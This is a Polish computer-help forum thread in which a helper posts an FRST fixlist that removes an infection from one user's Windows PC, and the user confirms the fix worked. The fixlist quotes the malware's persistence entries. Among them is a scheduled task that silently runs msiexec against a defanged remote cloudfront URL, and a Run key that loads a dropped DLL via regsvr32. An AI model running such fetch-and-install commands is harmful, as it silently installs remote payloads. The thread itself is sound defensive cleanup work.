Skocz do zawartości

Błąd w pliku Regsvr32


Rekomendowane odpowiedzi

Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

https://www.fixitpc.pl/topic/32661-uwaga-s%C4%85-op%C3%B3%C5%BAnienia-w-odpowiadaniu-nie-ma-os%C3%B3b-odpowiedzialnych-za-pomoc-trzeba-troch%C4%99-poczek%C4%87/

wcale nie musisz wykonywać moich zaleceń!

usuwanie podaję tylko na wypadek, gdybyś chciał szybko pozbyć się infekcji.

 

Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

 

CustomCLSID: HKU\S-1-5-21-137526994-970686790-3836505406-1001_Classes\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\InprocServer32 -> C:\Users\rekkis\AppData\Local\YZRPack\pxqxylft.dll => Brak pliku
Task: {0EA7836E-9169-4100-B5DA-E6B01BF3265F} - System32\Tasks\Microsoft\Windows\DeviceSettings\Fauphhawick => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=3219913727_198264_62260BF2&d=20170525 /q <==== UWAGA
HKU\S-1-5-21-137526994-970686790-3836505406-1001\...\Run: [Emsftion] => C:\Windows\System32\regsvr32.exe C:\Users\rekkis\AppData\Local\YZRPack\pxqxylft.dll <===== UWAGA
HKU\S-1-5-21-137526994-970686790-3836505406-1001\...409d6c4515e9\InprocServer32: [Default-shell32] C:\Users\rekkis\AppData\Local\YZRPack\pxqxylft.dll UWAGA
HKLM\...\Providers\oqfxjsqv: C:\Program Files\Hetutain Monitor\local32spl.dll
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\kxm63t72.default -> initialpage123
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\kxm63t72.default -> initialpage123
2017-05-25 15:11 - 2017-05-25 15:52 - 00000000 ____D C:\Users\rekkis\AppData\Roaming\nh3oukwai1x
2017-05-25 15:11 - 2017-05-25 15:52 - 00000000 ____D C:\Users\rekkis\AppData\Roaming\h0f152dudbg
2017-05-25 15:11 - 2017-05-25 15:11 - 00140800 _____ C:\Users\rekkis\AppData\Local\installer.dat
2017-05-25 15:11 - 2017-05-25 15:11 - 00011568 _____ C:\Users\rekkis\AppData\Local\InstallationConfiguration.xml
2017-05-25 15:11 - 2017-05-25 15:11 - 00000000 ____D C:\Users\rekkis\AppData\Roaming\lqzba204nx5
2017-05-25 15:10 - 2017-05-25 15:52 - 00000000 ____D C:\Users\rekkis\AppData\Roaming\2segbxvccsj
2017-05-25 15:09 - 2017-05-25 15:16 - 00000000 ____D C:\Users\rekkis\AppData\Roaming\Perbot
2017-05-25 15:09 - 2017-05-25 15:09 - 00000000 ____D C:\Users\rekkis\AppData\Local\Jukokdrozph
C:\Windows\Minidump\*.dmp
HOSTS:
EmptyTemp:

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 
Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

jessi

Edytowane przez Rucek
Odnośnik do komentarza

Przepraszam że tak późno odpowiadam, ale dopiero teraz mam możliwość. Co do sedna sprawy, to problem wynikał z błędu w pliku Regsvr32 spowodowanego infekcją. W międzyczasie przeczytałem trochę o programie FRST, ale brakło mi doświadczenia w tej aplikacji.  Super sprawa, wszystko działa jak należy :). Dziekuje ci Jessi pięknie za pomoc i pozdrawiam. 

Odnośnik do komentarza

Jessi przeanalizowała raporty poprawnie, więc nie mam co tu poprawiać. Usunęła infekcję i wyczyściła system, a co za tym idzie problem tytułowy. 

 

Dodam tylko, że jeden folder wymagana kasacji, a mianowicie C:\Program Files\Hetutain Monito, więc przez SHIFT + DELETE skasuj go. Po tym zabiegu uznaję, że możemy kończyć. 

 

Zastoju DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...